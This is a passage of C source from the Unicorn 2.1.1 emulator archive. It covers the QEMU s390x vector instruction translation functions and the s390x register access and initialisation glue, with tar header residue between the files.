return DISAS_NEXT; } static DisasJumpType op_vsl(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 shift = tcg_temp_new_i64(tcg_ctx); read_vec_element_i64(tcg_ctx, shift, get_field(s, v3), 7, ES_8); if (s->fields.op2 == 0x74) { tcg_gen_andi_i64(tcg_ctx, shift, shift, 0x7); } else { tcg_gen_andi_i64(tcg_ctx, shift, shift, 0x78); } gen_gvec_2i_ool(tcg_ctx, get_field(s, v1), get_field(s, v2), shift, 0, gen_helper_gvec_vsl); tcg_temp_free_i64(tcg_ctx, shift); return DISAS_NEXT; } static DisasJumpType op_vsldb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t i4 = get_field(s, i4) & 0xf; const int left_shift = (i4 & 7) * 8; const int right_shift = 64 - left_shift; TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); if ((i4 & 8) == 0) { read_vec_element_i64(tcg_ctx, t0, get_field(s, v2), 0, ES_64); read_vec_element_i64(tcg_ctx, t1, get_field(s, v2), 1, ES_64); read_vec_element_i64(tcg_ctx, t2, get_field(s, v3), 0, ES_64); } else { read_vec_element_i64(tcg_ctx, t0, get_field(s, v2), 1, ES_64); read_vec_element_i64(tcg_ctx, t1, get_field(s, v3), 0, ES_64); read_vec_element_i64(tcg_ctx, t2, get_field(s, v3), 1, ES_64); } tcg_gen_extract2_i64(tcg_ctx, t0, t1, t0, right_shift); tcg_gen_extract2_i64(tcg_ctx, t1, t2, t1, right_shift); write_vec_element_i64(tcg_ctx, t0, get_field(s, v1), 0, ES_64); write_vec_element_i64(tcg_ctx, t1, get_field(s, v1), 1, ES_64); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); return DISAS_NEXT; } static DisasJumpType op_vsra(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 shift = tcg_temp_new_i64(tcg_ctx); read_vec_element_i64(tcg_ctx, shift, get_field(s, v3), 7, ES_8); if (s->fields.op2 == 0x7e) { tcg_gen_andi_i64(tcg_ctx, shift, shift, 0x7); } else { tcg_gen_andi_i64(tcg_ctx, shift, shift, 0x78); } gen_gvec_2i_ool(tcg_ctx, get_field(s, v1), get_field(s, v2), shift, 0, gen_helper_gvec_vsra); tcg_temp_free_i64(tcg_ctx, shift); return DISAS_NEXT; } static DisasJumpType op_vsrl(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 shift = tcg_temp_new_i64(tcg_ctx); read_vec_element_i64(tcg_ctx, shift, get_field(s, v3), 7, ES_8); if (s->fields.op2 == 0x7c) { tcg_gen_andi_i64(tcg_ctx, shift, shift, 0x7); } else { tcg_gen_andi_i64(tcg_ctx, shift, shift, 0x78); } gen_gvec_2i_ool(tcg_ctx, get_field(s, v1), get_field(s, v2), shift, 0, gen_helper_gvec_vsrl); tcg_temp_free_i64(tcg_ctx, shift); return DISAS_NEXT; } static DisasJumpType op_vs(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); if (es > ES_128) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } else if (es == ES_128) { gen_gvec128_3_i64(tcg_ctx, tcg_gen_sub2_i64, get_field(s, v1), get_field(s, v2), get_field(s, v3)); return DISAS_NEXT; } gen_gvec_fn_3(tcg_ctx, sub, es, get_field(s, v1), get_field(s, v2), get_field(s, v3)); return DISAS_NEXT; } static void gen_scbi_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { tcg_gen_setcond_i32(tcg_ctx, TCG_COND_GEU, d, a, b); } static void gen_scbi_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { tcg_gen_setcond_i64(tcg_ctx, TCG_COND_GEU, d, a, b); } static void gen_scbi2_i64(TCGContext *tcg_ctx, TCGv_i64 dl, TCGv_i64 dh, TCGv_i64 al, TCGv_i64 ah, TCGv_i64 bl, TCGv_i64 bh) { TCGv_i64 th = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tl = tcg_temp_new_i64(tcg_ctx); TCGv_i64 zero = tcg_const_i64(tcg_ctx, 0); tcg_gen_sub2_i64(tcg_ctx, tl, th, al, zero, bl, zero); tcg_gen_andi_i64(tcg_ctx, th, th, 1); tcg_gen_sub2_i64(tcg_ctx, tl, th, ah, zero, th, zero); tcg_gen_sub2_i64(tcg_ctx, tl, th, tl, th, bh, zero); /* "invert" the result: -1 -> 0; 0 -> 1 */ tcg_gen_addi_i64(tcg_ctx, dl, th, 1); tcg_gen_mov_i64(tcg_ctx, dh, zero); tcg_temp_free_i64(tcg_ctx, th); tcg_temp_free_i64(tcg_ctx, tl); tcg_temp_free_i64(tcg_ctx, zero); } static DisasJumpType op_vscbi(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); static const GVecGen3 g[4] = { { .fno = gen_helper_gvec_vscbi8, }, { .fno = gen_helper_gvec_vscbi16, }, { .fni4 = gen_scbi_i32, }, { .fni8 = gen_scbi_i64, }, }; if (es > ES_128) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } else if (es == ES_128) { gen_gvec128_3_i64(tcg_ctx, gen_scbi2_i64, get_field(s, v1), get_field(s, v2), get_field(s, v3)); return DISAS_NEXT; } gen_gvec_3(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), &g[es]); return DISAS_NEXT; } static void gen_sbi2_i64(TCGContext *tcg_ctx, TCGv_i64 dl, TCGv_i64 dh, TCGv_i64 al, TCGv_i64 ah, TCGv_i64 bl, TCGv_i64 bh, TCGv_i64 cl, TCGv_i64 ch) { TCGv_i64 tl = tcg_temp_new_i64(tcg_ctx); TCGv_i64 th = tcg_temp_new_i64(tcg_ctx); tcg_gen_not_i64(tcg_ctx, tl, bl); tcg_gen_not_i64(tcg_ctx, th, bh); gen_ac2_i64(tcg_ctx, dl, dh, al, ah, tl, th, cl, ch); tcg_temp_free_i64(tcg_ctx, tl); tcg_temp_free_i64(tcg_ctx, th); } static DisasJumpType op_vsbi(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (get_field(s, m5) != ES_128) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec128_4_i64(tcg_ctx, gen_sbi2_i64, get_field(s, v1), get_field(s, v2), get_field(s, v3), get_field(s, v4)); return DISAS_NEXT; } static void gen_sbcbi2_i64(TCGContext *tcg_ctx, TCGv_i64 dl, TCGv_i64 dh, TCGv_i64 al, TCGv_i64 ah, TCGv_i64 bl, TCGv_i64 bh, TCGv_i64 cl, TCGv_i64 ch) { TCGv_i64 th = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tl = tcg_temp_new_i64(tcg_ctx); tcg_gen_not_i64(tcg_ctx, tl, bl); tcg_gen_not_i64(tcg_ctx, th, bh); gen_accc2_i64(tcg_ctx, dl, dh, al, ah, tl, th, cl, ch); tcg_temp_free_i64(tcg_ctx, tl); tcg_temp_free_i64(tcg_ctx, th); } static DisasJumpType op_vsbcbi(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (get_field(s, m5) != ES_128) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec128_4_i64(tcg_ctx, gen_sbcbi2_i64, get_field(s, v1), get_field(s, v2), get_field(s, v3), get_field(s, v4)); return DISAS_NEXT; } static DisasJumpType op_vsumg(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); TCGv_i64 sum, tmp; uint8_t dst_idx; if (es == ES_8 || es > ES_32) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } sum = tcg_temp_new_i64(tcg_ctx); tmp = tcg_temp_new_i64(tcg_ctx); for (dst_idx = 0; dst_idx < 2; dst_idx++) { uint8_t idx = dst_idx * NUM_VEC_ELEMENTS(es) / 2; const uint8_t max_idx = idx + NUM_VEC_ELEMENTS(es) / 2 - 1; read_vec_element_i64(tcg_ctx, sum, get_field(s, v3), max_idx, es); for (; idx <= max_idx; idx++) { read_vec_element_i64(tcg_ctx, tmp, get_field(s, v2), idx, es); tcg_gen_add_i64(tcg_ctx, sum, sum, tmp); } write_vec_element_i64(tcg_ctx, sum, get_field(s, v1), dst_idx, ES_64); } tcg_temp_free_i64(tcg_ctx, sum); tcg_temp_free_i64(tcg_ctx, tmp); return DISAS_NEXT; } static DisasJumpType op_vsumq(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); const uint8_t max_idx = NUM_VEC_ELEMENTS(es) - 1; TCGv_i64 sumh, suml, zero, tmpl; uint8_t idx; if (es < ES_32 || es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } sumh = tcg_const_i64(tcg_ctx, 0); suml = tcg_temp_new_i64(tcg_ctx); zero = tcg_const_i64(tcg_ctx, 0); tmpl = tcg_temp_new_i64(tcg_ctx); read_vec_element_i64(tcg_ctx, suml, get_field(s, v3), max_idx, es); for (idx = 0; idx <= max_idx; idx++) { read_vec_element_i64(tcg_ctx, tmpl, get_field(s, v2), idx, es); tcg_gen_add2_i64(tcg_ctx, suml, sumh, suml, sumh, tmpl, zero); } write_vec_element_i64(tcg_ctx, sumh, get_field(s, v1), 0, ES_64); write_vec_element_i64(tcg_ctx, suml, get_field(s, v1), 1, ES_64); tcg_temp_free_i64(tcg_ctx, sumh); tcg_temp_free_i64(tcg_ctx, suml); tcg_temp_free_i64(tcg_ctx, zero); tcg_temp_free_i64(tcg_ctx, tmpl); return DISAS_NEXT; } static DisasJumpType op_vsum(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); TCGv_i32 sum, tmp; uint8_t dst_idx; if (es > ES_16) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } sum = tcg_temp_new_i32(tcg_ctx); tmp = tcg_temp_new_i32(tcg_ctx); for (dst_idx = 0; dst_idx < 4; dst_idx++) { uint8_t idx = dst_idx * NUM_VEC_ELEMENTS(es) / 4; const uint8_t max_idx = idx + NUM_VEC_ELEMENTS(es) / 4 - 1; read_vec_element_i32(tcg_ctx, sum, get_field(s, v3), max_idx, es); for (; idx <= max_idx; idx++) { read_vec_element_i32(tcg_ctx, tmp, get_field(s, v2), idx, es); tcg_gen_add_i32(tcg_ctx, sum, sum, tmp); } write_vec_element_i32(tcg_ctx, sum, get_field(s, v1), dst_idx, ES_32); } tcg_temp_free_i32(tcg_ctx, sum); tcg_temp_free_i32(tcg_ctx, tmp); return DISAS_NEXT; } static DisasJumpType op_vtm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_gvec_2_ptr(tcg_ctx, get_field(s, v1), get_field(s, v2), tcg_ctx->cpu_env, 0, gen_helper_gvec_vtm); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_vfae(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); const uint8_t m5 = get_field(s, m5); static gen_helper_gvec_3 * const g[3] = { gen_helper_gvec_vfae8, gen_helper_gvec_vfae16, gen_helper_gvec_vfae32, }; static gen_helper_gvec_3_ptr * const g_cc[3] = { gen_helper_gvec_vfae_cc8, gen_helper_gvec_vfae_cc16, gen_helper_gvec_vfae_cc32, }; if (es > ES_32) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } if (extract32(m5, 0, 1)) { gen_gvec_3_ptr(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), tcg_ctx->cpu_env, m5, g_cc[es]); set_cc_static(s); } else { gen_gvec_3_ool(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), m5, g[es]); } return DISAS_NEXT; } static DisasJumpType op_vfee(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); const uint8_t m5 = get_field(s, m5); static gen_helper_gvec_3 * const g[3] = { gen_helper_gvec_vfee8, gen_helper_gvec_vfee16, gen_helper_gvec_vfee32, }; static gen_helper_gvec_3_ptr * const g_cc[3] = { gen_helper_gvec_vfee_cc8, gen_helper_gvec_vfee_cc16, gen_helper_gvec_vfee_cc32, }; if (es > ES_32 || m5 & ~0x3) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } if (extract32(m5, 0, 1)) { gen_gvec_3_ptr(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), tcg_ctx->cpu_env, m5, g_cc[es]); set_cc_static(s); } else { gen_gvec_3_ool(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), m5, g[es]); } return DISAS_NEXT; } static DisasJumpType op_vfene(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); const uint8_t m5 = get_field(s, m5); static gen_helper_gvec_3 * const g[3] = { gen_helper_gvec_vfene8, gen_helper_gvec_vfene16, gen_helper_gvec_vfene32, }; static gen_helper_gvec_3_ptr * const g_cc[3] = { gen_helper_gvec_vfene_cc8, gen_helper_gvec_vfene_cc16, gen_helper_gvec_vfene_cc32, }; if (es > ES_32 || m5 & ~0x3) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } if (extract32(m5, 0, 1)) { gen_gvec_3_ptr(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), tcg_ctx->cpu_env, m5, g_cc[es]); set_cc_static(s); } else { gen_gvec_3_ool(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), m5, g[es]); } return DISAS_NEXT; } static DisasJumpType op_vistr(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); const uint8_t m5 = get_field(s, m5); static gen_helper_gvec_2 * const g[3] = { gen_helper_gvec_vistr8, gen_helper_gvec_vistr16, gen_helper_gvec_vistr32, }; static gen_helper_gvec_2_ptr * const g_cc[3] = { gen_helper_gvec_vistr_cc8, gen_helper_gvec_vistr_cc16, gen_helper_gvec_vistr_cc32, }; if (es > ES_32 || m5 & ~0x1) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } if (extract32(m5, 0, 1)) { gen_gvec_2_ptr(tcg_ctx, get_field(s, v1), get_field(s, v2), tcg_ctx->cpu_env, 0, g_cc[es]); set_cc_static(s); } else { gen_gvec_2_ool(tcg_ctx, get_field(s, v1), get_field(s, v2), 0, g[es]); } return DISAS_NEXT; } static DisasJumpType op_vstrc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m5); const uint8_t m6 = get_field(s, m6); static gen_helper_gvec_4 * const g[3] = { gen_helper_gvec_vstrc8, gen_helper_gvec_vstrc16, gen_helper_gvec_vstrc32, }; static gen_helper_gvec_4 * const g_rt[3] = { gen_helper_gvec_vstrc_rt8, gen_helper_gvec_vstrc_rt16, gen_helper_gvec_vstrc_rt32, }; static gen_helper_gvec_4_ptr * const g_cc[3] = { gen_helper_gvec_vstrc_cc8, gen_helper_gvec_vstrc_cc16, gen_helper_gvec_vstrc_cc32, }; static gen_helper_gvec_4_ptr * const g_cc_rt[3] = { gen_helper_gvec_vstrc_cc_rt8, gen_helper_gvec_vstrc_cc_rt16, gen_helper_gvec_vstrc_cc_rt32, }; if (es > ES_32) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } if (extract32(m6, 0, 1)) { if (extract32(m6, 2, 1)) { gen_gvec_4_ptr(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), get_field(s, v4), tcg_ctx->cpu_env, m6, g_cc_rt[es]); } else { gen_gvec_4_ptr(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), get_field(s, v4), tcg_ctx->cpu_env, m6, g_cc[es]); } set_cc_static(s); } else { if (extract32(m6, 2, 1)) { gen_gvec_4_ool(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), get_field(s, v4), m6, g_rt[es]); } else { gen_gvec_4_ool(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), get_field(s, v4), m6, g[es]); } } return DISAS_NEXT; } static DisasJumpType op_vfa(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t fpf = get_field(s, m4); const uint8_t m5 = get_field(s, m5); const bool se = extract32(m5, 3, 1); gen_helper_gvec_3_ptr *fn; if (fpf != FPF_LONG || extract32(m5, 0, 3)) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } switch (s->fields.op2) { case 0xe3: fn = se ? gen_helper_gvec_vfa64s : gen_helper_gvec_vfa64; break; case 0xe5: fn = se ? gen_helper_gvec_vfd64s : gen_helper_gvec_vfd64; break; case 0xe7: fn = se ? gen_helper_gvec_vfm64s : gen_helper_gvec_vfm64; break; case 0xe2: fn = se ? gen_helper_gvec_vfs64s : gen_helper_gvec_vfs64; break; default: g_assert_not_reached(); } gen_gvec_3_ptr(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), tcg_ctx->cpu_env, 0, fn); return DISAS_NEXT; } static DisasJumpType op_wfc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t fpf = get_field(s, m3); const uint8_t m4 = get_field(s, m4); if (fpf != FPF_LONG || m4) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } if (s->fields.op2 == 0xcb) { gen_gvec_2_ptr(tcg_ctx, get_field(s, v1), get_field(s, v2), tcg_ctx->cpu_env, 0, gen_helper_gvec_wfc64); } else { gen_gvec_2_ptr(tcg_ctx, get_field(s, v1), get_field(s, v2), tcg_ctx->cpu_env, 0, gen_helper_gvec_wfk64); } set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_vfc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t fpf = get_field(s, m4); const uint8_t m5 = get_field(s, m5); const uint8_t m6 = get_field(s, m6); const bool se = extract32(m5, 3, 1); const bool cs = extract32(m6, 0, 1); gen_helper_gvec_3_ptr *fn; if (fpf != FPF_LONG || extract32(m5, 0, 3) || extract32(m6, 1, 3)) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } if (cs) { switch (s->fields.op2) { case 0xe8: fn = se ? gen_helper_gvec_vfce64s_cc : gen_helper_gvec_vfce64_cc; break; case 0xeb: fn = se ? gen_helper_gvec_vfch64s_cc : gen_helper_gvec_vfch64_cc; break; case 0xea: fn = se ? gen_helper_gvec_vfche64s_cc : gen_helper_gvec_vfche64_cc; break; default: g_assert_not_reached(); } } else { switch (s->fields.op2) { case 0xe8: fn = se ? gen_helper_gvec_vfce64s : gen_helper_gvec_vfce64; break; case 0xeb: fn = se ? gen_helper_gvec_vfch64s : gen_helper_gvec_vfch64; break; case 0xea: fn = se ? gen_helper_gvec_vfche64s : gen_helper_gvec_vfche64; break; default: g_assert_not_reached(); } } gen_gvec_3_ptr(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), tcg_ctx->cpu_env, 0, fn); if (cs) { set_cc_static(s); } return DISAS_NEXT; } static DisasJumpType op_vcdg(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t fpf = get_field(s, m3); const uint8_t m4 = get_field(s, m4); const uint8_t erm = get_field(s, m5); const bool se = extract32(m4, 3, 1); gen_helper_gvec_2_ptr *fn; if (fpf != FPF_LONG || extract32(m4, 0, 2) || erm > 7 || erm == 2) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } switch (s->fields.op2) { case 0xc3: fn = se ? gen_helper_gvec_vcdg64s : gen_helper_gvec_vcdg64; break; case 0xc1: fn = se ? gen_helper_gvec_vcdlg64s : gen_helper_gvec_vcdlg64; break; case 0xc2: fn = se ? gen_helper_gvec_vcgd64s : gen_helper_gvec_vcgd64; break; case 0xc0: fn = se ? gen_helper_gvec_vclgd64s : gen_helper_gvec_vclgd64; break; case 0xc7: fn = se ? gen_helper_gvec_vfi64s : gen_helper_gvec_vfi64; break; case 0xc5: fn = se ? gen_helper_gvec_vflr64s : gen_helper_gvec_vflr64; break; default: g_assert_not_reached(); } gen_gvec_2_ptr(tcg_ctx, get_field(s, v1), get_field(s, v2), tcg_ctx->cpu_env, deposit32(m4, 4, 4, erm), fn); return DISAS_NEXT; } static DisasJumpType op_vfll(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t fpf = get_field(s, m3); const uint8_t m4 = get_field(s, m4); gen_helper_gvec_2_ptr *fn = gen_helper_gvec_vfll32; if (fpf != FPF_SHORT || extract32(m4, 0, 3)) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } if (extract32(m4, 3, 1)) { fn = gen_helper_gvec_vfll32s; } gen_gvec_2_ptr(tcg_ctx, get_field(s, v1), get_field(s, v2), tcg_ctx->cpu_env, 0, fn); return DISAS_NEXT; } static DisasJumpType op_vfma(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t m5 = get_field(s, m5); const uint8_t fpf = get_field(s, m6); const bool se = extract32(m5, 3, 1); gen_helper_gvec_4_ptr *fn; if (fpf != FPF_LONG || extract32(m5, 0, 3)) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } if (s->fields.op2 == 0x8f) { fn = se ? gen_helper_gvec_vfma64s : gen_helper_gvec_vfma64; } else { fn = se ? gen_helper_gvec_vfms64s : gen_helper_gvec_vfms64; } gen_gvec_4_ptr(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), get_field(s, v4), tcg_ctx->cpu_env, 0, fn); return DISAS_NEXT; } static DisasJumpType op_vfpso(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t v1 = get_field(s, v1); const uint8_t v2 = get_field(s, v2); const uint8_t fpf = get_field(s, m3); const uint8_t m4 = get_field(s, m4); const uint8_t m5 = get_field(s, m5); TCGv_i64 tmp; if (fpf != FPF_LONG || extract32(m4, 0, 3) || m5 > 2) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } if (extract32(m4, 3, 1)) { tmp = tcg_temp_new_i64(tcg_ctx); read_vec_element_i64(tcg_ctx, tmp, v2, 0, ES_64); switch (m5) { case 0: /* sign bit is inverted (complement) */ tcg_gen_xori_i64(tcg_ctx, tmp, tmp, 1ull << 63); break; case 1: /* sign bit is set to one (negative) */ tcg_gen_ori_i64(tcg_ctx, tmp, tmp, 1ull << 63); break; case 2: /* sign bit is set to zero (positive) */ tcg_gen_andi_i64(tcg_ctx, tmp, tmp, (1ull << 63) - 1); break; } write_vec_element_i64(tcg_ctx, tmp, v1, 0, ES_64); tcg_temp_free_i64(tcg_ctx, tmp); } else { switch (m5) { case 0: /* sign bit is inverted (complement) */ gen_gvec_fn_2i(tcg_ctx, xori, ES_64, v1, v2, 1ull << 63); break; case 1: /* sign bit is set to one (negative) */ gen_gvec_fn_2i(tcg_ctx, ori, ES_64, v1, v2, 1ull << 63); break; case 2: /* sign bit is set to zero (positive) */ gen_gvec_fn_2i(tcg_ctx, andi, ES_64, v1, v2, (1ull << 63) - 1); break; } } return DISAS_NEXT; } static DisasJumpType op_vfsq(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t fpf = get_field(s, m3); const uint8_t m4 = get_field(s, m4); gen_helper_gvec_2_ptr *fn = gen_helper_gvec_vfsq64; if (fpf != FPF_LONG || extract32(m4, 0, 3)) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } if (extract32(m4, 3, 1)) { fn = gen_helper_gvec_vfsq64s; } gen_gvec_2_ptr(tcg_ctx, get_field(s, v1), get_field(s, v2), tcg_ctx->cpu_env, 0, fn); return DISAS_NEXT; } static DisasJumpType op_vftci(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint16_t i3 = get_field(s, i3); const uint8_t fpf = get_field(s, m4); const uint8_t m5 = get_field(s, m5); gen_helper_gvec_2_ptr *fn = gen_helper_gvec_vftci64; if (fpf != FPF_LONG || extract32(m5, 0, 3)) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } if (extract32(m5, 3, 1)) { fn = gen_helper_gvec_vftci64s; } gen_gvec_2_ptr(tcg_ctx, get_field(s, v1), get_field(s, v2), tcg_ctx->cpu_env, i3, fn); set_cc_static(s); return DISAS_NEXT; } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/unicorn.c�����������������������������������������������������������0000664�0000000�0000000�00000007230�14675241067�0020152�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015-2021 */ #include "sysemu/cpus.h" #include "cpu.h" #include "unicorn_common.h" #include "uc_priv.h" #include "unicorn.h" #include "internal.h" S390CPU *cpu_s390_init(struct uc_struct *uc, const char *cpu_model); static void s390_set_pc(struct uc_struct *uc, uint64_t address) { ((CPUS390XState *)uc->cpu->env_ptr)->psw.addr = address; } static uint64_t s390_get_pc(struct uc_struct *uc) { return ((CPUS390XState *)uc->cpu->env_ptr)->psw.addr; } static void s390_release(void *ctx) { int i; TCGContext *tcg_ctx = (TCGContext *)ctx; S390CPU *cpu = (S390CPU *)tcg_ctx->uc->cpu; CPUTLBDesc *d = cpu->neg.tlb.d; CPUTLBDescFast *f = cpu->neg.tlb.f; CPUTLBDesc *desc; CPUTLBDescFast *fast; release_common(ctx); for (i = 0; i < NB_MMU_MODES; i++) { desc = &(d[i]); fast = &(f[i]); g_free(desc->iotlb); g_free(fast->table); } s390_cpu_model_finalize((CPUState *)cpu); // TODO: Anymore to free? } static void reg_reset(struct uc_struct *uc) { CPUArchState *env = uc->cpu->env_ptr; memset(env->regs, 0, sizeof(env->regs)); memset(env->aregs, 0, sizeof(env->aregs)); env->psw.addr = 0; } DEFAULT_VISIBILITY uc_err reg_read(void *_env, int mode, unsigned int regid, void *value, size_t *size) { CPUS390XState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_S390X_REG_R0 && regid <= UC_S390X_REG_R15) { CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->regs[regid - UC_S390X_REG_R0]; } else if (regid >= UC_S390X_REG_A0 && regid <= UC_S390X_REG_A15) { CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->regs[regid - UC_S390X_REG_A0]; } else { switch (regid) { default: break; case UC_S390X_REG_PC: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->psw.addr; break; case UC_S390X_REG_PSWM: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = get_psw_mask(env); break; } } return ret; } DEFAULT_VISIBILITY uc_err reg_write(void *_env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc) { CPUS390XState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_S390X_REG_R0 && regid <= UC_S390X_REG_R15) { CHECK_REG_TYPE(uint64_t); env->regs[regid - UC_S390X_REG_R0] = *(uint64_t *)value; } else if (regid >= UC_S390X_REG_A0 && regid <= UC_S390X_REG_A15) { CHECK_REG_TYPE(uint32_t); env->regs[regid - UC_S390X_REG_A0] = *(uint32_t *)value; } else { switch (regid) { default: break; case UC_S390X_REG_PC: CHECK_REG_TYPE(uint64_t); env->psw.addr = *(uint64_t *)value; *setpc = 1; break; case UC_S390X_REG_PSWM: CHECK_REG_TYPE(uint64_t); env->psw.mask = *(uint64_t *)value; env->cc_op = (env->psw.mask >> 44) & 3; break; } } return ret; } static int s390_cpus_init(struct uc_struct *uc, const char *cpu_model) { S390CPU *cpu; cpu = cpu_s390_init(uc, cpu_model); if (cpu == NULL) { return -1; } return 0; } DEFAULT_VISIBILITY void uc_init(struct uc_struct *uc) { uc->release = s390_release; uc->reg_read = reg_read; uc->reg_write = reg_write; uc->reg_reset = reg_reset; uc->set_pc = s390_set_pc; uc->get_pc = s390_get_pc; uc->cpus_init = s390_cpus_init; uc->cpu_context_size = offsetof(CPUS390XState, end_reset_fields); uc_common_init(uc); } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/unicorn.h�����������������������������������������������������������0000664�0000000�0000000�00000000745�14675241067�0020163�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015-2021 */ #ifndef UC_QEMU_TARGET_S390X_H #define UC_QEMU_TARGET_S390X_H // functions to read & write registers uc_err reg_read_s390x(void *env, int mode, unsigned int regid, void *value, 